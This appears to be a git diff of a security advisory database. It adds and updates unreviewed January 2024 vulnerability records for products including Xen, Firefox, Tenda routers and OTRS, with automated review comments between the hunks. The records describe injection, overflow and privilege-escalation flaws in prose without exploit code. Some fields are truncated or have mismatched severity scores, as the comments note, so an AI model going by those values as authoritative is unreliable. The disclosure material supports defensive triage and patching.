@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3mr-pjj3-2g74", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2023-46838" + ], + "details": "Transmit requests in Xen's virtual network protocol can consist of\nmultiple parts. While not really useful, except for the initial part\nany of them may be of zero length, i.e. carry no data at all. Besides a\ncertain initial portion of the to be transferred data, these parts are\ndirectly translated into what Linux calls SKB fragments. Such converted\nrequest parts can, when for a particular SKB they are all of length\nzero, lead to a de-reference of NULL in core networking code.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46838" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGEKT4DKSDXDS34EL7M4UVJMMPH7Z3ZZ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/" + }, + { + "type": "WEB", + "url": "https://xenbits.xenproject.org/xsa/advisory-448.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T11:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json new file mode 100644 index 0000000000000..f7de03edc9d25 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m525-p4rf-7h93", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23790" + ], + "details": "Improper Input Validation vulnerability in the upload functionality for user avatars allows functionality misuse due to missing check of filetypes.\nThis issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023 through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23790" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-01/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-354" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json b/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json new file mode 100644 index 0000000000000..43617565ebbcb --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5qf-4xvf-462h", + "modified": "2024-01-31T15:30:19Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2023-7043" + ], + "details": "Unquoted service path in ESET products allows to \n\ndrop a prepared program to a specific location and run on boot with the \n\nNT AUTHORITY\\NetworkService permissions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7043" + }, + { + "type": "WEB", + "url": "https://support.eset.com/en/ca8602" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json b/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json new file mode 100644 index 0000000000000..3e4ea42510633 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m653-22c6-v2w8", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7204" + ], + "details": "The WP STAGING WordPress Backup plugin before 3.2.0 allows access to cache files during the cloning process which provides", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7204" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/65a8cf83-d6cc-4d4c-a482-288a83a69879/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-668" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json b/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json new file mode 100644 index 0000000000000..e9b1d74ecb7a8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json 
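Review bot: The `details` string in this new record is cut off mid-sentence — it ends with `...during the cloning process which provides` — so the impact clause that would justify the C:H vector and the HIGH severity is missing from the advisory text. The text is mirrored from the NVD description, so the fix is to re-sync once upstream corrects it or to complete the sentence from the wpscan reference listed in the hunk; it should not ship as is, because downstream UIs render `details` verbatim. Until then a reader cannot tell from this record what the exposed cache files actually contain.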
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m866-467g-64fm", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1117" + ], + "details": "A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1117" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/Liu1nbjddxu4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252475" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252475" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json b/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json index fd081562eb517..c2c8bc840ee8e 100644 --- a/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json +++ b/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0567" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0567" 
@@ -33,10 +37,18 @@ "type": "WEB", "url": "https://gitlab.com/gnutls/gnutls/-/issues/1521" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0011/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json b/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json index 15b491acbe6b3..c7c9a1ba8a57e 100644 --- a/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json +++ b/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mf35-vrf5-mh78", - "modified": "2024-01-24T09:30:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T09:30:25Z", "aliases": [ "CVE-2023-43317" ], "details": "An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T07:15:46Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json b/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json index 5558b2124d9ab..9a1dfa7bae323 100644 --- a/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json +++ b/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mff6-fp66-7vrp", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0752" ], "details": "A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json b/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json index dd9b870159674..680af466a4065 100644 --- a/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json +++ b/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mfgp-fvpm-hx5v", - "modified": "2024-01-25T03:30:58Z", + "modified": "2024-02-08T03:32:45Z", "published": "2024-01-17T21:30:21Z", "aliases": [ "CVE-2023-44077" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44077" }, + { + "type": "WEB", + "url": "https://khronokernel.com/macos/2024/01/18/CVE-2023-44077.html" + }, { "type": "WEB", "url": "https://support.studionetworksolutions.com/hc/en-us/articles/22494658980244-ShareBrowser-v-7-0-Released" diff --git a/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json b/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json index 4a251e5c41e22..76ab25491b616 100644 --- a/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json 
+++ b/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mfm9-9c5w-7f5g", - "modified": "2024-01-23T00:30:31Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-23T00:30:31Z", "aliases": [ "CVE-2021-42141" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T23:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json b/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json index ad9b76b5f68cd..b5cfdc0afd043 100644 --- a/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json +++ b/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json 
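Review bot: The severity added in this hunk, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` mapped to `"severity": "CRITICAL"`, does not match the `details` text, which describes the tinyDTLS epoch-handling bug as something that "may cause denial of service" — a pure availability impact would read C:N/I:N/A:H. The vector is NVD's and is mirrored here, so this is not a transcription error in the commit, but an unreviewed CRITICAL on a 2018-era embedded DTLS stack will be over-prioritised by anyone triaging on `database_specific.severity` alone; consider flagging the record for review or asking NVD to reconcile the score with the description. The CWE-755 assignment in the second hunk is consistent with the description.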
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mgr5-ggf9-pgjr", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47195" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47196.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json b/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json index 005b86b321817..e5ce329848893 100644 --- a/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json +++ b/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mh49-xg6j-w6xh", - "modified": "2024-01-24T06:30:18Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T06:30:18Z", "aliases": [ "CVE-2024-22372" ], "details": "OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T05:15:14Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json b/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json index 9d38e4ddd5688..07f919fececea 100644 --- a/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json +++ b/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20961" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json b/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json index 5bb5089ec11c8..f203fa2c758a1 100644 --- a/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json 
+++ b/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7192" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-7192" diff --git a/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json b/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json index 579c20a6c61a5..883d12a9f4fa5 100644 --- a/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json +++ b/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mmx8-j2r4-x8r6", - "modified": "2024-01-19T18:30:29Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-19T18:30:29Z", "aliases": [ "CVE-2023-47034" ], "details": "A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json b/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json new file mode 100644 index 0000000000000..23a0d9816eac1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq7v-2xj4-rhjj", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-30T12:30:18Z", + "aliases": [ + "CVE-2024-22894" + ], + "details": "An issue in AIT-Deutschland Alpha Innotec Heatpumps wp2reg-V.3.88.0-9015 and Novelan Heatpumps wp2reg-V.3.88.0-9015, allows remote attackers to execute arbitrary code via the password component in the shadow file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22894" + }, + { + "type": "WEB", + "url": "https://github.com/Jaarden/AlphaInnotec-Password-Vulnerability/" + }, + { + "type": "WEB", + "url": "https://github.com/Jaarden/CVE-2024-22894" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json b/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json index bf11c47e6c235..2239b926ddae1 100644 --- a/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json +++ b/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mqpp-vj24-2f9c", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51208" ], "details": "An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
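Review bot: The `details` text says the issue "allows remote attackers to execute arbitrary code", but the vector added alongside it is `AV:P` (physical access), and the two cannot both be right; one of them should be corrected before this record is used for prioritisation. The description locates the flaw in the password component of the `shadow` file, which reads more like a weak or default credential (CWE-798/CWE-259 territory) than the CWE-326 inadequate-encryption-strength given in `cwe_ids`; that is an inference from the wording and should be checked against the two GitHub references in the hunk. Both values are inherited from the NVD entry, so the realistic fix is to flag the record for review rather than hand-edit it here.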
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-434"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T22:15:16Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json b/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json
new file mode 100644
index 0000000000000..6831b4fae6fab
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mr4x-vwjp-hm5f",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-1031"
+ ],
+ "details": "A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1031"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252304"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252304"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T13:15:09Z"
+ }
+}
\ No newline at end of file
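Review bot: In the new GHSA-mr4x-vwjp-hm5f record, `database_specific.severity` is `"MODERATE"` while its only `severity` entry, `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N`, evaluates to a 3.5 base score, which is Low under CVSS 3.1; every other record in this chunk that carries both fields agrees with its vector. The two values may have come from different sources (for example a CNA-supplied vector and a separately computed score), so whichever one this database treats as authoritative should be confirmed and the other corrected, `"severity": "LOW",` being the value that matches the vector as written. The GHSA-mqpp-vj24-2f9c hunk sharing this line is consistent (its 9.8 vector and "CRITICAL" agree).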
diff --git a/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json b/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json
new file mode 100644
index 0000000000000..896afc1f14ce5
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mrf8-vvv3-qvpr",
+ "modified": "2024-01-29T03:30:18Z",
+ "published": "2024-01-29T03:30:18Z",
+ "aliases": [
+ "CVE-2024-0993"
+ ],
+ "details": "A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0993"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252258"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252258"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121",
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json b/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json
index 12a8a0c1ee22a..974ec2635236a 100644
--- a/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json
+++ b/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mvvq-wfcg-vq6m",
- "modified": "2024-01-23T15:30:58Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T15:30:58Z",
 "aliases": [
 "CVE-2024-0751"
 ],
 "details": "A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -26,6 +29,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html"
 },
+ {
